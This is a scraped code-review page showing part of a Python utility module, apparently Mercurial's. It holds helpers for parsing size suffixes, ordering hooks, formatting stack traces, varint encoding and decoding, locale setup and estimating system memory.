# Size suffixes accepted by sizetoint() with their byte multipliers,
# matched with endswith() in this order (longer suffixes like b'kb' are
# never shadowed because the single letters m/k/g cannot end a string
# that ends in b'b').
_sizeunits = (
    (b'm', 2 ** 20),
    (b'k', 2 ** 10),
    (b'g', 2 ** 30),
    (b'kb', 2 ** 10),
    (b'mb', 2 ** 20),
    (b'gb', 2 ** 30),
    (b'b', 1),
)


def sizetoint(s):
    # type: (bytes) -> int
    """Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    """
    text = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if text.endswith(suffix):
                value = float(text[: -len(suffix)])
                return int(value * multiplier)
        # no suffix: plain integer byte count
        return int(text)
    except ValueError:
        raise error.ParseError(_(b"couldn't parse size: %s") % s)
3479 3481
3480 3482
class hooks(object):
    """A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources."""

    def __init__(self):
        # list of (source, hook) pairs; sorted lazily on invocation
        self._hooks = []

    def add(self, source, hook):
        """Register *hook* under the given *source* name."""
        self._hooks.append((source, hook))

    def __call__(self, *args):
        """Invoke all hooks with *args*; return their results in call order."""
        self._hooks.sort(key=lambda entry: entry[0])
        return [fn(*args) for _src, fn in self._hooks]
3498 3500
3499 3501
def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
    """Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    """
    frames = traceback.extract_stack()[: -skip - 1]
    entries = [
        (fileline % (pycompat.sysbytes(fname), lineno), pycompat.sysbytes(fn))
        for fname, lineno, fn, _text in frames
    ]
    # depth == 0 keeps everything ([-0:] is the whole list)
    entries = entries[-depth:]
    if not entries:
        return
    width = max(len(loc) for loc, _fn in entries)
    for loc, fn in entries:
        if line is None:
            yield (width, loc, fn)
        else:
            yield line % (width, loc, fn)
3523 3525
3524 3526
def debugstacktrace(
    msg=b'stacktrace',
    skip=0,
    f=procutil.stderr,
    otherf=procutil.stdout,
    depth=0,
    prefix=b'',
):
    """Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    """
    if otherf:
        # flush the other stream first so the trace is not interleaved
        # with buffered output (typically stdout)
        otherf.flush()
    f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
    # skip + 1 also hides this helper's own frame from the trace
    for line in getstackframes(skip + 1, depth=depth):
        f.write(prefix + line)
    f.flush()


# convenient shortcut
dst = debugstacktrace
3549 3551
3550 3552
3551 3553 def safename(f, tag, ctx, others=None):
3552 3554 """
3553 3555 Generate a name that it is safe to rename f to in the given context.
3554 3556
3555 3557 f: filename to rename
3556 3558 tag: a string tag that will be included in the new name
3557 3559 ctx: a context, in which the new name must not exist
3558 3560 others: a set of other filenames that the new name must not be in
3559 3561
3560 3562 Returns a file name of the form oldname~tag[~number] which does not exist
3561 3563 in the provided context and is not in the set of other names.
3562 3564 """
3563 3565 if others is None:
3564 3566 others = set()
3565 3567
3566 3568 fn = b'%s~%s' % (f, tag)
3567 3569 if fn not in ctx and fn not in others:
3568 3570 return fn
3569 3571 for n in itertools.count(1):
3570 3572 fn = b'%s~%s~%s' % (f, tag, n)
3571 3573 if fn not in ctx and fn not in others:
3572 3574 return fn
3573 3575
3574 3576
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    if len(data) < n:
        # short read: the stream ended before n bytes were available
        raise error.Abort(
            _(b"stream ended unexpectedly (got %d bytes, expected %d)")
            % (len(data), n)
        )
    return data
3584 3586
3585 3587
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    chunks = []
    remaining = value
    while True:
        bits = remaining & 0x7F
        remaining >>= 7
        if remaining:
            # continuation: more 7-bit groups follow, set the high bit
            chunks.append(pycompat.bytechr(0x80 | bits))
        else:
            # final group: high bit clear terminates the varint
            chunks.append(pycompat.bytechr(bits))
            break
    return b''.join(chunks)
3621 3623
3622 3624
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
    # each byte carries 7 payload bits, least significant group first
    for shift in itertools.count(0, 7):
        octet = ord(readexactly(fh, 1))
        value |= (octet & 0x7F) << shift
        if not octet & 0x80:
            # high bit clear marks the final byte
            return value
3655 3657
3656 3658
3657 3659 # Passing the '' locale means that the locale should be set according to the
3658 3660 # user settings (environment variables).
3659 3661 # Python sometimes avoids setting the global locale settings. When interfacing
3660 3662 # with C code (e.g. the curses module or the Subversion bindings), the global
3661 3663 # locale settings must be initialized correctly. Python 2 does not initialize
3662 3664 # the global locale settings on interpreter startup. Python 3 sometimes
3663 3665 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3664 3666 # explicitly initialize it to get consistent behavior if it's not already
3665 3667 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3666 3668 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3667 3669 # if we can remove this code.
@contextlib.contextmanager
def with_lc_ctype():
    """Temporarily initialize LC_CTYPE from the environment when it is 'C'.

    Needed so C code (curses, Subversion bindings, ...) sees correctly
    initialized global locale settings; the previous value is restored on
    exit.
    """
    previous = locale.setlocale(locale.LC_CTYPE, None)
    if previous != 'C':
        # already initialized; nothing to do
        yield
        return
    try:
        try:
            locale.setlocale(locale.LC_CTYPE, '')
        except locale.Error:
            # The likely case is that the locale from the environment
            # variables is unknown.
            pass
        yield
    finally:
        locale.setlocale(locale.LC_CTYPE, previous)
3684 3686
3685 3687
def _estimatememory():
    # type: () -> Optional[int]
    """Provide an estimate for the available system memory in Bytes.

    If no estimate can be provided on the platform, returns None.
    """
    if pycompat.sysplatform.startswith(b'win'):
        # On Windows, use the GlobalMemoryStatusEx kernel function directly.
        # Structure, byref, sizeof and windll live in the ctypes module
        # itself, not in ctypes.wintypes: importing them from wintypes
        # raises ImportError on Python 3 (only Python 2's wintypes
        # star-imported ctypes), which broke this branch on Windows.
        from ctypes import (
            Structure,
            byref,
            c_long as DWORD,
            c_ulonglong as DWORDLONG,
            sizeof,
            windll,  # pytype: disable=import-error
        )

        class MEMORYSTATUSEX(Structure):
            _fields_ = [
                ('dwLength', DWORD),
                ('dwMemoryLoad', DWORD),
                ('ullTotalPhys', DWORDLONG),
                ('ullAvailPhys', DWORDLONG),
                ('ullTotalPageFile', DWORDLONG),
                ('ullAvailPageFile', DWORDLONG),
                ('ullTotalVirtual', DWORDLONG),
                ('ullAvailVirtual', DWORDLONG),
                ('ullExtendedVirtual', DWORDLONG),
            ]

        x = MEMORYSTATUSEX()
        x.dwLength = sizeof(x)
        windll.kernel32.GlobalMemoryStatusEx(byref(x))
        return x.ullAvailPhys

    # On newer Unix-like systems and Mac OSX, the sysconf interface
    # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
    # seems to be implemented on most systems.
    try:
        pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
        pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
        return pagesize * pages
    except OSError:  # sysconf can fail
        pass
    except KeyError:  # unknown parameter
        pass
General Comments 0
You need to be logged in to leave comments. Login now